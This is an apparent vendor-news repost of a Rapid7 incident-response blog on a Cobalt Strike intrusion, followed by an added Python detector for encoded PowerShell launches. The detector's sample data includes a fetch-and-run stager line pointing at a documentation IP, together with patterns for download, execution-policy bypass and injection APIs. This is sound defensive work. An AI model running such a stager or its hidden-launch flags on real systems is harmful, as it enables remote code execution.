
Volume 327, Issue 3 · IT Vendor News · Rapid7

Innovative Tunnelling And Forensic Tool Abuse: IR Tales From The Field

Rapid7, Tuesday, June 17th, 2025

Rapid7's Incident Response (IR) team was engaged to investigate an incident involving an attempted Cobalt Strike execution. The investigation uncovered pre-ransomware activity, tunnelling tools, and attackers taking a page out of the defender's playbook by abusing tools normally used for forensics.

The attacker took careful steps to maintain access to the environment through persistence that mimicked normal user behavior. This blog covers the techniques, indicators of compromise (IoCs), and detections for Rapid7 customers.

Observed attacker behavior

In this incident, the attacker executed an elaborately obfuscated PowerShell command to establish a Cobalt Strike beacon. Cobalt Strike (CS) is typically deployed once an attacker already has a stable foothold in an environment; it is a full-featured command-and-control framework used to maintain persistent access and execute commands remotely.
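The post does not reproduce the obfuscated PowerShell command it observed, so the following is an added example by the editor, not Rapid7's code or detection content. It shows the kind of check a responder runs over process-creation events to surface encoded or hidden PowerShell launches: locate an `-EncodedCommand` switch (PowerShell accepts any unambiguous prefix such as `-e`, `-ec` or `-enc`), decode the UTF-16LE/Base64 payload, and score the command line plus the decoded script against coarse loader indicators. The sample events, the `STAGER` script (pointing at a TEST-NET-1 address) and the indicator lists are all constructed for illustration; a real deployment would feed Sysmon Event ID 1 or EDR telemetry and tune the lists.

```python
"""Flag encoded / obfuscated PowerShell launches in process-creation events.

Added example for this article (editor's own heuristics). The events and
indicator lists below are constructed for illustration and are NOT the
command or detections from the Rapid7 investigation.
"""
import base64
import re

POWERSHELL_IMAGES = ("powershell.exe", "pwsh.exe", "powershell_ise.exe")

# Indicators common in staged beacon loaders (assumption: coarse, illustrative list).
SUSPICIOUS_TOKENS = {
    r"\biex\b": "Invoke-Expression alias",
    r"invoke-expression": "Invoke-Expression",
    r"frombase64string": "inline Base64 payload",
    r"downloadstring|downloaddata|downloadfile": "WebClient download",
    r"net\.webclient": "Net.WebClient",
    r"invoke-webrequest|\biwr\b": "Invoke-WebRequest",
    r"virtualalloc|createthread": "shellcode injection API",
    r"\[char\]|-join|\.replace\(|-replace": "string-building obfuscation",
}

# Switches used to hide the console or skip policy; scanned on the raw command line only.
HIDING_FLAGS = {
    r"-w(indowstyle)?\s+hidden": "hidden window",
    r"-nop(rofile)?\b": "no profile",
    r"-noni(nteractive)?\b": "non-interactive",
    r"-ep\s+bypass|-executionpolicy\s+bypass": "execution policy bypass",
}


def encode_ps(script: str) -> str:
    """Encode a script the way powershell.exe -EncodedCommand expects (UTF-16LE, then Base64)."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def decode_ps(blob: str):
    """Reverse of encode_ps; returns None when the blob is not a decodable encoded command."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except ValueError:          # binascii.Error is a ValueError subclass
        return None
    if len(raw) % 2:            # UTF-16LE needs an even byte count
        return None
    try:
        return raw.decode("utf-16le")
    except UnicodeDecodeError:
        return None


def find_encoded_command(args):
    """Return the argument following an -EncodedCommand switch (or any accepted prefix / alias), else None."""
    for i, arg in enumerate(args[:-1]):
        if arg[:1] not in ("-", "/"):
            continue
        a = arg.lstrip("-/").lower()
        if a and (a == "ec" or "encodedcommand".startswith(a)):
            return args[i + 1]
    return None


def analyze_event(event: dict) -> dict:
    """Score one process-creation event; returns the findings and the decoded script, if any."""
    image = event["image"].rsplit("\\", 1)[-1].lower()
    findings, decoded = [], None
    if image not in POWERSHELL_IMAGES:
        return {"score": 0, "findings": findings, "decoded": decoded}

    cmdline = event["cmdline"]
    blob = find_encoded_command(cmdline.split())
    if blob is not None:
        findings.append("encoded command")
        decoded = decode_ps(blob)
        if decoded is None:
            findings.append("encoded command does not decode (tampered or non-UTF-16LE payload)")
        cmdline = cmdline.replace(blob, "")   # never regex-scan the Base64 itself

    for pattern, label in HIDING_FLAGS.items():
        if re.search(pattern, cmdline, re.IGNORECASE):
            findings.append(label)
    text = cmdline + ("\n" + decoded if decoded else "")
    for pattern, label in SUSPICIOUS_TOKENS.items():
        if re.search(pattern, text, re.IGNORECASE):
            findings.append(label)
    return {"score": len(findings), "findings": findings, "decoded": decoded}


# Constructed sample events (192.0.2.10 is in TEST-NET-1, reserved for documentation).
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/a')"
PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"image": PS_IMAGE, "cmdline": "powershell.exe -NoP -W Hidden -Ep Bypass -Enc " + encode_ps(STAGER)},
    {"image": PS_IMAGE, "cmdline": "powershell.exe -Command Get-Service -Name Spooler"},
    {"image": PS_IMAGE, "cmdline": "powershell.exe -e not_base64!!"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        result = analyze_event(ev)
        print(f"score={result['score']} findings={result['findings']}")
        if result["decoded"]:
            print("  decoded:", result["decoded"])
```

The first event decodes to the stager and scores on the encoded switch, the three hiding flags and the three loader tokens; the benign `Get-Service` launch scores zero; the third shows the failure mode a responder should not ignore, a switch whose payload does not decode, which is itself worth a finding rather than a silent skip.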
